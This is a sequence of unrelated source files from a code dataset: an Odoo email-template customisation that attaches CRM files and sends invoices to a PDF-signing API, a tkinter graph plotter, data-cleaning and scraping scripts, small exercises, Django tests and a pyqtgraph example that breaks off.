fname, value)\n\n def onchange_template_id(self, template_id, composition_mode, model, res_id):\n \"\"\" - mass_mailing: we cannot render, so return the template values\n - normal mode: return rendered values\n /!\\ for x2many field, this onchange return command instead of ids\n \"\"\"\n if template_id and composition_mode == 'mass_mail':\n template = self.env['mail.template'].browse(template_id)\n fields = ['subject', 'body_html', 'email_from', 'reply_to', 'mail_server_id']\n values = dict((field, getattr(template, field)) for field in fields if getattr(template, field))\n if template.attachment_ids:\n values['attachment_ids'] = [att.id for att in template.attachment_ids]\n if template.mail_server_id:\n values['mail_server_id'] = template.mail_server_id.id\n if template.user_signature and 'body_html' in values:\n signature = self.env.user.signature\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)\n elif template_id:\n values = self.generate_email_for_composer(template_id, [res_id])[res_id]\n # transform attachments into attachment_ids; not attached to the document because this will\n # be done further in the posting process, allowing to clean database if email not send\n\n attachment_ids = []\n ##########################\n if(model == 'sale.order'):\n sale_order = self.env['sale.order'].search([('id','=', self.res_id)])\n \n if(sale_order and sale_order.x_studio_oportunidad):\n crm_lead = self.env['crm.lead'].search([('id','=',sale_order.x_studio_oportunidad.id)])\n 
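# Custom behaviour of this module: besides the template's own attachments,\n                # pull in every file already attached to the linked CRM lead, and rebuild\n                # the report attachments of the lead's other draft quotations (see below).\n                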
if(crm_lead):\n \n crm_attachment_ids = self.env['ir.attachment'].search(['&',('res_model','=','crm.lead'),('res_id', '=', crm_lead.id)])\n if(crm_attachment_ids):\n for line in crm_attachment_ids:\n attachment_ids.append(line.id)\n \n # sale_order_attachment_ids = self.env['ir.attachment'].search(['&',('res_model','=','sale.order'),('res_id', 'in', crm_lead.order_ids.ids)])\n # if(sale_order_attachment_ids):\n # attachment_ids.append(sale_order_attachment_ids.ids)\n\n for line in crm_lead.order_ids:\n if(line.state == 'draft' and line.id != res_id):\n template_values = self.env['mail.template'].with_context(tpl_partners_only=True).browse(template_id).generate_email(line.id, fields=['attachment_ids'])\n values['attachments'].append(template_values['attachments'][0])\n\n\n ##########################\n\n Attachment = self.env['ir.attachment']\n for attach_fname, attach_datas in values.pop('attachments', []):\n data_attach = {\n 'name': attach_fname,\n 'datas': attach_datas,\n 'res_model': 'mail.compose.message',\n 'res_id': 0,\n 'type': 'binary', # override default_type from context, possibly meant for another model!\n }\n attachment_ids.append(Attachment.create(data_attach).id)\n if values.get('attachment_ids', []) or attachment_ids:\n values['attachment_ids'] = [(6, 0, values.get('attachment_ids', []) + attachment_ids)]\n else:\n default_values = self.with_context(default_composition_mode=composition_mode, default_model=model, default_res_id=res_id).default_get(['composition_mode', 'model', 'res_id', 'parent_id', 'partner_ids', 'subject', 'body', 'email_from', 'reply_to', 'attachment_ids', 'mail_server_id'])\n values = dict((key, default_values[key]) for key in ['subject', 'body', 'partner_ids', 'email_from', 'reply_to', 'attachment_ids', 'mail_server_id'] if key in default_values)\n\n if values.get('body_html'):\n values['body'] = values.pop('body_html')\n\n # This onchange should return command instead of ids for x2many field.\n values = self._convert_to_write(values)\n\n return {'value': values}\n\n @api.model\n def generate_email_for_composer(self, template_id, res_ids, fields=None):\n \"\"\" Call email_template.generate_email(), get fields relevant for\n mail.compose.message, transform email_cc and email_to into partner_ids \"\"\"\n multi_mode = True\n if isinstance(res_ids, int):\n multi_mode = False\n res_ids = [res_ids]\n\n if fields is None:\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'attachment_ids', 'mail_server_id']\n returned_fields = fields + ['partner_ids', 'attachments']\n values = dict.fromkeys(res_ids, False)\n\n template_values = self.env['mail.template'].with_context(tpl_partners_only=True).browse(template_id).generate_email(res_ids, fields=fields)\n for res_id in res_ids:\n res_id_values = dict((field, template_values[res_id][field]) for field in returned_fields if template_values[res_id].get(field))\n res_id_values['body'] = res_id_values.pop('body_html', '')\n values[res_id] = res_id_values\n\n return multi_mode and values or values[res_ids[0]]\n\n\n\nclass mail_custom_1(models.Model):\n \n _inherit = 'mail.template'\n\n def generate_email(self, res_ids, fields=None):\n \"\"\"Generates an email from the template for given the given model based on\n records given by res_ids.\n\n :param res_id: id of the record to use for rendering the template (model\n is taken from template definition)\n :returns: a dict containing all relevant fields for creating a new\n mail.mail entry, with one extra key ``attachments``, in 
the\n format [(report_name, data)] where data is base64 encoded.\n \"\"\"\n self.ensure_one()\n multi_mode = True\n if isinstance(res_ids, int):\n res_ids = [res_ids]\n multi_mode = False\n if fields is None:\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'scheduled_date']\n\n res_ids_to_templates = self.get_email_template(res_ids)\n\n # templates: res_id -> template; template -> res_ids\n templates_to_res_ids = {}\n for res_id, template in res_ids_to_templates.items():\n templates_to_res_ids.setdefault(template, []).append(res_id)\n\n results = dict()\n for template, template_res_ids in templates_to_res_ids.items():\n Template = self.env['mail.template']\n # generate fields value for all res_ids linked to the current template\n if template.lang:\n Template = Template.with_context(lang=template._context.get('lang'))\n for field in fields:\n Template = Template.with_context(safe=field in {'subject'})\n generated_field_values = Template._render_template(\n getattr(template, field), template.model, template_res_ids,\n post_process=(field == 'body_html'))\n for res_id, field_value in generated_field_values.items():\n results.setdefault(res_id, dict())[field] = field_value\n # compute recipients\n if any(field in fields for field in ['email_to', 'partner_to', 'email_cc']):\n results = template.generate_recipients(results, template_res_ids)\n # update values for all res_ids\n for res_id in template_res_ids:\n values = results[res_id]\n # body: add user signature, sanitize\n if 'body_html' in fields and template.user_signature:\n signature = self.env.user.signature\n if signature:\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)\n if values.get('body_html'):\n values['body'] = tools.html_sanitize(values['body_html'])\n # technical settings\n values.update(\n mail_server_id=template.mail_server_id.id or False,\n auto_delete=template.auto_delete,\n model=template.model,\n res_id=res_id or False,\n attachment_ids=[attach.id for attach in template.attachment_ids],\n )\n\n # Add report in attachments: generate once for all template_res_ids\n if template.report_template:\n for res_id in template_res_ids:\n attachments = []\n report_name = self._render_template(template.report_name, template.model, res_id)\n report = template.report_template\n report_service = report.report_name\n\n if report.report_type in ['qweb-html', 'qweb-pdf']:\n result, format = report.render_qweb_pdf([res_id])\n else:\n res = report.render([res_id])\n if not res:\n raise UserError(_('Unsupported report type %s found.') % report.report_type)\n result, format = res\n\n # TODO in trunk, change return format to binary to match message_post expected format\n result = base64.b64encode(result)\n\n ###########################################################\n\n if(self.model == \"account.move\" and self.name == \"Invoice: Send by email\"):\n sign_pdf_api = self.env['ir.config_parameter'].sudo().get_param('x_sign_pdf_url_api')\n api_token = self.env['ir.config_parameter'].sudo().get_param('x_api_token')\n paramaters = {\n 'api_token': str(api_token),\n 'pdf_file': result.decode('utf-8') \n }\n #.decode('utf-8')\n\n pdf_sign = requests.post(\\\n sign_pdf_api, \n headers={'Content-type': 'application/json', 'Accept': 'application/json'}, \\\n data=json.dumps(paramaters))\n\n if(pdf_sign):\n if(pdf_sign.status_code == 200):\n response_sign = json.loads(pdf_sign.text)\n result = response_sign['certified_file']\n \n 
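# Note: the signing endpoint is assumed to accept the base64-encoded PDF in\n                    # 'pdf_file' and to return the signed document, still base64-encoded, under\n                    # 'certified_file', so the value can be attached below without re-encoding.\n                    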
###########################################################\n\n\n if not report_name:\n report_name = 'report.' + report_service\n ext = \".\" + format\n if not report_name.endswith(ext):\n report_name += ext\n attachments.append((report_name, result))\n results[res_id]['attachments'] = attachments\n\n return multi_mode and results or results[res_ids[0]]","sub_path":"custom_modules/sale_mail_attachment_custom/models/sale_mail_attachment.py","file_name":"sale_mail_attachment.py","file_ext":"py","file_size_in_byte":17933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362415006","text":"'''\nName: Prachi Santosh kolte\n\nFile description: This file contains the graph plotter user need to provide a,b,c cordinates of the equation which calculates values of\nY based on X range [-5,5] and plot the graph in the form of line and points\nsteps to run:\n1. intially program starts with some basic values which respresents the simple equation\n2.User need to click on new equation or select from menu to get graph of new equation\n3. There are certain mathematical validations provided to input of the a,b,c values\n4. After inputing the value and sucessful submission select the option from radio button the way you want to display the graph\n5. Also can choose to clear the current graph or can change the graph from dotted to direct line also\n6. you can also save your graph .ps in current directory\n\n\n'''\n\n\n\n\n\n\n\n\n\nfrom tkinter import *\nimport tkinter\nimport tkinter.messagebox\nfrom tkinter import messagebox\n\n\nclass CoefficientsDialog:\n def __init__(self, master):\n self.parent = master\n self.coefficients = None # Default value, to say its not been set yet\n\n self.master = Toplevel(self.parent)\n self.master.transient(self.parent)\n\n self.master.title(\"Coefficients \")\n self.lbl1 = Label(self.master, text=\"X^2 +\").grid(row=0, column=1, sticky=E)\n self.lbl2 = Label(self.master, text=\"X +\").grid(row=1, column=1, sticky=E)\n self.lbl3 = Label(self.master, text=\" +\").grid(row=2, column=1, sticky=E)\n self.ent1 = Entry(self.master)\n self.ent1.grid(row=0, column=0)\n self.ent2 = Entry(self.master)\n self.ent2.grid(row=1, column=0)\n self.ent3 = Entry(self.master)\n self.ent3.grid(row=2, column=0)\n btn1 = tkinter.Button(self.master, text=\"Submit\", command=self.submit, image=None)\n btn1.grid()\n\n def submit(self, event=None):\n '''\n Handle submit button action\n '''\n\n try:\n data = int(self.ent1.get())\n if data == 0:\n raise Exception\n data2 = int(self.ent2.get())\n data3 = int(self.ent3.get())\n print (data)\n print (data2)\n print (data3)\n self.coefficients={'a':data,'b':data2,'c':data3}\n self.master.destroy()\n\n except ValueError:\n\n error_window = tkinter.Tk()\n error_window.title(\"Error\")\n error_window.geometry(\"200x200\")\n label = Label(error_window, text=\"Please enter integer\", height=0, width=100)\n b = Button(error_window, text=\"Ok\", width=20, command=error_window.destroy)\n label.pack()\n b.pack(side='bottom', padx=0, pady=0)\n except Exception as e:\n error_window = tkinter.Tk()\n error_window.title(\"Error\")\n error_window.geometry(\"100x100\")\n label = Label(error_window, text=\"X^2 value can not be 0\", height=0, width=100)\n b = Button(error_window, text=\"Ok\", width=20, command=error_window.destroy)\n label.pack()\n b.pack(side='bottom', padx=0, pady=0)\n def show(self):\n self.toplevel.deiconify()\n self.toplevel.wait_window()\n value = self.var.get()\n return value\n\n\nclass 
QuadEQPlot:\n def __init__(self,a,b,c):\n self.a = a\n self.b = b\n self.c = c\n self.x_values = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]\n self.y_values = []\n # print(self.x_values)\n self.init_widget()\n\n self.window.mainloop()\n\n def hello(self):\n print(\"hello!\")\n\n def init_widget(self):\n self.coefficientsDialog = None\n self.window = tkinter.Tk()\n # self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n self.window.title(\"Function Plot\")\n self.eqation = \"No Equation\"\n self.height = 700\n self.width = 700\n self.window.geometry(\"{}x{}\".format(self.width, self.height))\n\n self.root = tkinter.Frame(self.window)\n self.root.pack(expand=True, fill=\"both\")\n\n self.new_equation = Button(self.root, text=\"New Equation\", width=20, command=self.get_new_coefficient)\n self.new_equation.pack()\n\n self.labelframe = LabelFrame(self.root)\n self.labelframe.pack(expand=True, fill=\"both\")\n\n self.eqationLabel = Label(self.labelframe, text=self.eqation)\n self.eqationLabel.pack(side='left')\n\n self.canvas = tkinter.Canvas(self.root, width=500, height=500, bg=\"white\")\n self.canvas.pack()\n\n self.plot_axis()\n self.plot_equation()\n\n #################radiobutton###################\n R1 = Radiobutton(self.window, text=\"Points\", command=self.plot_points)\n R1.pack(side='right')\n\n R2 = Radiobutton(self.window, text=\"Lines\", command=self.plot_line)\n R2.pack(side='right')\n ################## Menu##################\n menubar = Menu(self.window)\n\n # create a pulldown menu, and add it to the menu bar\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"New Equation\", command=self.get_new_coefficient)\n filemenu.add_command(label=\"Save plot .ps\", command=self.save_canvas)\n filemenu.add_separator()\n filemenu.add_command(label=\"Clear\", command=self.clear_canvas)\n filemenu.add_command(label=\"Exit\", command=self.exit_window)\n\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.show_help_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n # display the menu\n self.window.config(menu=menubar)\n ##########################\n\n\n\n def plot_axis(self):\n self.canvas.create_line(250, 50, 250, 450, width=2, fill=\"blue\")\n self.canvas.create_line(50, 250, 450, 250, width=2, fill=\"blue\")\n\n def plot_equation(self):\n self.clear_canvas()\n\n self.plot_axis()\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n\n\n print(\"########################################\")\n print (self.y_values)\n print(\"########################################\")\n ################################\n x_x0 = 50 # x axis\n y_x0 = 250 # for x axis\n\n x_y0 = 250 # for y axis\n y_y0 = 50 # for y axis\n d = 40\n\n for i in range(-5, 6):\n self.canvas.create_line(x_x0, y_x0, x_x0 + 1, y_x0 + 1, fill='darkblue') ## for x axis\n self.canvas.create_line(x_y0, y_y0, x_y0 + 1, y_y0 + 1, fill='darkblue') ## for y axis\n\n x_x0 = x_x0 + d\n y_y0 = y_y0 + d\n x_x0 = 50 # x axis\n y_x0 = 250 # x axis\n for value in self.x_values:\n self.canvas.create_text(x_x0, y_x0 + 5, fill=\"Black\", font=\"Times 10 italic bold\", text=value)\n print(\"x_x0:\", x_x0, value)\n x_x0 = x_x0 + d\n\n x_y0 = 250 # for y axis\n y_y0 = 50 # for y axis\n d = 40\n\n for value in self.y_values[:5]:\n print(\"*****\")\n print(value)\n self.canvas.create_text(x_y0 + 10, y_y0, fill=\"darkblue\", font=\"Times 10 italic bold\", text=value)\n\n y_y0 = y_y0 + d\n\n x_y0 = 250 # 
for y axis\n y_y0 = 450 # for y axis\n d = 40\n for value in self.y_values[:5]:\n print(value * (-1))\n self.canvas.create_text(x_y0 + 10, y_y0, fill=\"darkblue\", font=\"Times 10 italic bold\",\n text=value * (-1))\n\n\n y_y0 = y_y0 - d\n ########## #################################\n\n self.y_values = []\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n\n self.eqationLabel[\n \"text\"] = self.get_a_coeff_expression() + self.get_b_coeff_expression() + self.get_c_coeff_expression()\n\n def get_new_coefficient(self):\n if self.coefficientsDialog == None:\n self.coefficientsDialog = CoefficientsDialog(self.root)\n self.coefficientsDialog.parent.wait_window(self.coefficientsDialog.master)\n self.a = self.coefficientsDialog.coefficients['a']\n self.b = self.coefficientsDialog.coefficients['b']\n self.c = self.coefficientsDialog.coefficients['c']\n # print (self.a)\n # print (self.b)\n # print (self.c)\n self.plot_axis()\n self.plot_equation()\n self.coefficientsDialog = None\n\n\n def plot_points(self):\n self.clear_canvas()\n self.plot_axis()\n self.plot_equation()\n try:\n y_min = abs(min(self.y_values))\n y_max = abs(max(self.y_values))\n\n y_final = y_min if y_min > y_max else y_max\n y_ratio = y_final / 5\n print(y_final)\n\n for i in range(len(self.x_values)):\n x_ax = (self.x_values[i] + 5) * 40 + 50\n y_ax = (-1 * self.y_values[i] / y_ratio * 40) + 250\n #print(x_ax, y_ax)\n self.canvas.create_oval(x_ax - 2, y_ax - 2, x_ax + 2, y_ax + 2, outline=\"red\", fill=\"yellow\")\n except:\n pass\n\n\n\n def plot_line(self):\n self.clear_canvas()\n self.plot_axis()\n self.plot_equation()\n y_min = abs(min(self.y_values))\n y_max = abs(max(self.y_values))\n\n y_final = y_min if y_min > y_max else y_max\n y_ratio = y_final / 5\n print(y_final)\n lines_cordionates={}\n\n for i in range(len(self.x_values)):\n x_ax = (self.x_values[i] + 5) * 40 + 50\n y_ax = (-1 * self.y_values[i] / y_ratio * 40) + 250\n lines_cordionates[i]=x_ax,y_ax\n try:\n\n for i in range(len(self.x_values)):\n self.canvas.create_line(lines_cordionates[i][0], lines_cordionates[i][1], lines_cordionates[i+1][0], lines_cordionates[i+1][1], fill='darkblue')\n except:\n pass\n def exit_window(self):\n if messagebox.askyesno(\"Exit\", \"Do you want to quit the application?\"):\n self.window.destroy()\n\n def clear_canvas(self):\n\n self.canvas.delete(\"all\")\n\n def new_equation(self):\n self.plot_axis()\n self.y_values = []\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n self.plot_points()\n self.eqationLabel[\n \"text\"] = self.get_a_coeff_expression() + self.get_b_coeff_expression() + self.get_c_coeff_expression()\n\n def get_new_coefficient(self):\n if self.coefficientsDialog == None:\n self.coefficientsDialog = CoefficientsDialog(self.root)\n self.coefficientsDialog.parent.wait_window(self.coefficientsDialog.master)\n self.a = self.coefficientsDialog.coefficients['a']\n self.b = self.coefficientsDialog.coefficients['b']\n self.c = self.coefficientsDialog.coefficients['c']\n\n self.plot_axis()\n self.plot_equation()\n self.coefficientsDialog = None\n\n def get_a_coeff_expression(self):\n if self.a > 1 or self.a < -1:\n return str(self.a) + \"X\" + u\"\\u00B2\"\n elif self.a == -1:\n return \"-X\" + u\"\\u00B2\"\n else:\n return \"X\" + u\"\\u00B2\"\n\n def get_b_coeff_expression(self):\n coeef = self.b\n if coeef > 1:\n return \"+\" + str(coeef) + \"X\"\n elif coeef < -1:\n return str(coeef) + \"X\"\n elif coeef == 1:\n return \"+\" + \"X\"\n elif 
coeef == -1:\n return \"-\" + \"X\"\n else:\n return \"\"\n\n def get_c_coeff_expression(self):\n coeef = self.c\n if coeef > 0:\n return \"+\" + str(coeef)\n elif coeef < 0:\n return str(coeef)\n else:\n return \"\"\n\n def save_canvas(self):\n self.canvas.postscript(file=\"1017665.ps\", colormode='color')\n\n def show_help_about(self):\n top = Toplevel()\n top.title(\"About this application...\")\n\n msg = Message(top, text=\"Created by Prachi Kolte \\n UB ID: 1017665\")\n msg.pack()\n\n button = Button(top, text=\"Dismiss\", command=top.destroy)\n button.pack()\n\n\nobj = QuadEQPlot(1, 0, 0)\n\n","sub_path":"Graph_window.py","file_name":"Graph_window.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"16231270","text":"#!/usr/bin/env python3\n\n\nimport os\nimport cv2\nimport shutil\n\nfrom utils import load_pickle_file\n\nallowed_width = 256\nallowed_height = 192 \n\nimages, labels = load_pickle_file(\"pickles/image_data_normalized.p\")\n\nif not os.path.exists(\"test_images\"):\n os.makedirs(\"test_images\")\n\nfor img_path in images:\n img = cv2.imread(img_path)\n resized_img = cv2.resize(img,(allowed_width,allowed_height))\n \n parts = img_path.split(\"/\")\n save_path = os.path.join(\"test_images\",\"_\".join(parts[-2:]))\n cv2.imwrite(save_path,resized_img)","sub_path":"build_test_images.py","file_name":"build_test_images.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237140007","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nfrom scipy.stats import zscore\nimport statsmodels.api as sm\nfrom sklearn.model_selection import cross_val_score,GridSearchCV,train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge\nfrom sklearn.decomposition import NMF,PCA\nfrom sklearn.metrics import accuracy_score, r2_score\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#Here, we're importing out 500_Cities datasets\ndf = pd.read_csv('500_Cities__Local_Data_for_Better_Health__2018_release.zip')\n\n# we only need non-adusted numbers, and only for cities not electoral areas\nhealth = df[(df.Data_Value_Type=='Crude prevalence') & \n (df.GeographicLevel.isin(['City','US'])) ]\n\n# pivot so that we have Columns for all the Health Measures, instead of a Row\nhealth_pivot = pd.pivot_table(health, values='Data_Value', index=['StateDesc', 'CityName'], \n columns=['Short_Question_Text'], aggfunc=np.sum).reset_index()\n\n# Pivot table on cities & multi index categories & short question text (short for measure). average on Data Value. \ncategory = df['Category'] == 'Health Outcomes'\ndfPiv = df.pivot_table(index='CityName',columns=['Category','Short_Question_Text'],values='Data_Value',aggfunc=np.mean)\n#Create zscore for all columns to standardize data\ndfPivZscore = dfPiv.apply(zscore)\n\n#Spliting the original data into 3 parts -\n#1. Location dataset 2. Data Definition dataset 3. 
Data Values\ncolumns_locations = ['UniqueID','StateAbbr','StateDesc','CityName','GeographicLevel', 'TractFIPS','CityFIPS','GeoLocation']\ncolumns_data_definition = ['Category', 'CategoryID', 'Measure','MeasureId','Data_Value_Type','Short_Question_Text']\ncolumns_data = ['Data_Value','DataValueTypeID','Data_Value_Footnote_Symbol', 'Data_Value_Footnote','CategoryID',\n                'GeoLocation','Low_Confidence_Limit', 'High_Confidence_Limit','PopulationCount','StateAbbr',\n                'UniqueID','MeasureId','Year']\n\n\n#Since the column GeoLocation holds 2 values (latitude, longitude) in one column, we are splitting them into 2 different columns.\ndf_locations = df[columns_locations].copy()\nlat = []\nlong =[]\nfor row in df_locations['GeoLocation']:\n    try:\n        # Split the row by comma and append everything before the comma to lat\n        latitude = row.split(',')[0]\n        latitude = latitude[1:]\n        lat.append(latitude)\n        # Split the row by comma and append everything after the comma to lon\n        longitude = row.split(',')[1]\n        longitude = longitude[:-1]\n        long.append(longitude)\n    except:\n        # append a missing value to lat\n        lat.append(np.NaN)\n        # append a missing value to lon\n        long.append(np.NaN)\n# Create two new columns from lat and lon\ndf_locations['Latitude'] = lat\ndf_locations['Longitude'] = long\n\ndel df_locations['GeoLocation']\ndf_locations = df_locations.drop_duplicates().sort_values('UniqueID')\ndf_locations.to_csv('locations.csv')\n\n","sub_path":"cs418_phak/cleanDataframe_locations.py","file_name":"cleanDataframe_locations.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"458443995","text":"import requests\nfrom bs4 import BeautifulSoup\n# Take the code from the How To Decode A Website exercise\n# (if you didn’t do it or just want to play with some different code, use the code from the solution),\n# and instead of printing the results to a screen, write the results to a txt file.\n# In your code, just make up a name for the file you are saving to.\n#\n# Extras:\n#\n# Ask the user to specify the name of the output file that will be saved.\n# Discussion\n#\n# Topics:\n#\n# Writing to a file\n# Gotchas and warnings\n\n\ndef web_spider(p_f_name):\n    url = \"https://www.nytimes.com/\"\n    r = requests.get(url)\n    r_html = r.text\n    soup = BeautifulSoup(r_html, \"lxml\")\n    f_path = \"c:/tmp/\"+p_f_name+\".txt\"\n    f = open(f_path, \"w\", encoding='utf-8')\n    for story_heading in soup.find_all(class_=\"story-heading\"):\n        if story_heading.a:\n            f.write(story_heading.a.text.replace(\"\\n\", \" \").strip())\n            f.write(\"\\n\")\n        else:\n            f.write(story_heading.contents[0].strip())\n            f.write(\"\\n\")\n    f.close()\n    print(\"all information has been done in \" + f_path)\n\nf_name = str(input(\"please input to save file name as below:\\n\"))\nweb_spider(f_name)\n","sub_path":"org/practicepython/21WriteToAFile.py","file_name":"21WriteToAFile.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"344040813","text":"N = [ int(n) for n in \"\".join([ input() for _ in range(20) ]) ]\n\nfrom functools import reduce\n\nmax_product = -1\ni = 0\nwhile i <= len(N) - 13:\n    A = N[i:i+13]\n\n    if 0 in A:\n        # a zero kills the product, so jump straight past the last zero in this window\n        zero = A[::-1].index(0)\n        i += 13 - zero\n        continue\n\n    product = reduce(lambda x, y: x*y, A)\n    if product > max_product:\n        max_product = product\n\n    i += 
1\n\nprint(max_product)","sub_path":"python/problem_008.py","file_name":"problem_008.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"293651642","text":"import random\n\ncards = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\ncards_pos = []\npos = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n\n\nfor i in range(8):\n for j in range(2):\n cards_pos.append(cards[i])\n\nrandom.shuffle(cards_pos)\n\nevent = len(cards)\nmoves = 0\nwhile event > 0:\n x = random.choice(pos)\n choice_1 = cards_pos[x]\n t_pos = pos[:]\n t_pos.remove(x)\n y = random.choice(t_pos)\n choice_2 = cards_pos[y]\n moves += 1\n print(choice_1+\" \"+choice_2)\n if choice_1 == choice_2:\n print(\"Trafione\")\n event -=1\n pos.remove(x)\n pos.remove(y)\n\n\nprint(\"Liczba wszystkich ruchów: \"+str(moves))\n\n# while end == False:\n#\n# if move == 1:\n# if event.type == pygame.locals.MOUSEBUTTONDOWN:\n# x, y = pygame.mouse.get_pos()\n# pole = self.board.cards_pos\n# for pos in pole:\n# if pos.collidepoint(x, y):\n# t_pos = pos\n# choice_1 = self.board.unhide(pos)\n# pygame.display.update()\n# move+=1\n# elif move == 2:\n# if event.type == pygame.locals.MOUSEBUTTONDOWN:\n# x, y = pygame.mouse.get_pos()\n# pole = self.board.cards_pos\n# for pos in pole:\n# if pos.collidepoint(x, y):\n# choice_2 = self.board.unhide(pos)\n# pygame.display.update()\n# if choice_1 == choice_2:\n# print(\"trafione\")\n# else:\n# move = 1\n# self.hide(pos)\n# self.hide(t_pos)\n","sub_path":"count_rules.py","file_name":"count_rules.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"634391103","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 18-08-2020\nTitle: Scrivere una funziona di nome usa_tutte che richieda una parola e \nuna stringa di lettere richieste e che restituisca True se la parola utilizza \ntutte le lettere richeiste almeno una volta\n\"\"\"\n\ndef usa_tutte(word, letter_list):\n for letter in letter_list:\n if not (letter in word):\n return False\n return True\n\nletters = input(\"Insert letters...\\n\")\nfin = open(\"words.txt\")\ncounter = 0\n\nfor line in fin:\n if usa_tutte(line.strip(), letters):\n print(line.strip())\n counter = counter + 1\n\nprint(f\"\\n\\n{counter}\") #598 words use all vocals\n\n\n","sub_path":"tpsit_IV/summer_works/es9_5.py","file_name":"es9_5.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"518290496","text":"from django.test import TestCase\nfrom django.test import Client\nimport datetime\n\n# Create your tests here.\n\nfrom .models import Rankinglist, Player, Match, Ranking\n\nclass ViewsTest(TestCase):\n def setUp(self):\n # Every test needs a client.\n self.client = Client()\n r = Rankinglist.objects.create(name=\"herren\")\n \n roger = Player.objects.create(firstname=\"Roger\",lastname=\"Federer\")\n boris = Player.objects.create(firstname=\"Boris\",lastname=\"Becker\")\n ivan = Player.objects.create(firstname=\"Ivan\",lastname=\"Lendl\")\n\n Ranking.objects.create(position=1,rankinglist=r,player=ivan)\n Ranking.objects.create(position=2,rankinglist=r,player=roger)\n Ranking.objects.create(position=3,rankinglist=r,player=boris)\n\n Match.objects.create(rankinglist=r,playerone=boris,playertwo=ivan,playedat=datetime.datetime(2020, 5, 17)) \n 
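# Fixture summary: Boris takes part in all three matches, Ivan in two and\n        # Roger in one, which is exactly what test_rankingliststats asserts below.\n        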
Match.objects.create(rankinglist=r,playerone=boris,playertwo=roger,playedat=datetime.datetime(2020, 5, 16))\n Match.objects.create(rankinglist=r,playerone=boris,playertwo=ivan,playedat=datetime.datetime(2020, 5, 15))\n\n def test_rankingliststats(self): \n r = Rankinglist.objects.get(name=\"herren\")\n\n # Issue a GET request.\n response = self.client.get('/rankinglist/rankinglist/%s/stats' %(r.id))\n\n # Check that the response is 200 OK.\n self.assertEqual(response.status_code, 200)\n\n # Check that the rendered context contains 5 customers.\n self.assertEqual(response.context['rankinglist'].name,\"herren\")\n playersList = response.context['players']\n self.assertEqual(len(playersList),3)\n for i in range(len(playersList)):\n entry = playersList[i]\n if i == 0:\n self.assertEqual(entry[0].firstname,\"Boris\")\n self.assertEqual(entry[1],3)\n elif i == 1:\n self.assertEqual(entry[0].firstname,\"Ivan\")\n self.assertEqual(entry[1],2)\n elif i == 2:\n self.assertEqual(entry[0].firstname,\"Roger\")\n self.assertEqual(entry[1],1)\n else:\n self.assertTrue(False)","sub_path":"rankinglist/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560083309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSimple examples demonstrating the use of GLMeshItem.\n\n\"\"\"\n\n## Add path to library (just for examples; you do not need this)\n\n\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\n\napp = QtGui.QApplication([])\nw = gl.GLViewWidget()\nw.show()\nw.setWindowTitle('pyqtgraph example: GLMeshItem')\nw.setCameraPosition(distance=20)\n\ng = gl.GLGridItem()\ng.scale(1, 1, 1)\nw.addItem(g)\n\nimport numpy as np\n\n\n## Example 1:\n## Array of vertex positions and array of vertex indexes defining faces\n## Colors are specified per-face\n\nverts = np.array([\n [0, 0, 0], # 0\n [2, 0, 0], # 1\n [2, 5, 0], # 2\n [0, 5, 0], # 3\n [0, 0, 1], # 4\n [2, 0, 1], # 5\n [2, 5, 1], # 6\n [0, 5, 1], # 7\n])\nfaces = np.array([\n # bottom face\n [0, 1, 2],\n [2, 3, 0],\n # top face\n [4, 5, 6],\n [6, 7, 4],\n # back face\n [0, 1, 5],\n [0, 4, 5],\n # front face\n [2, 3, 7],\n [2, 6, 7],\n # right face\n [1, 2, 6],\n [1, 5, 6],\n # left face\n [0, 3, 7],\n [0, 4, 7],\n])\ncolors = np.array([\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n 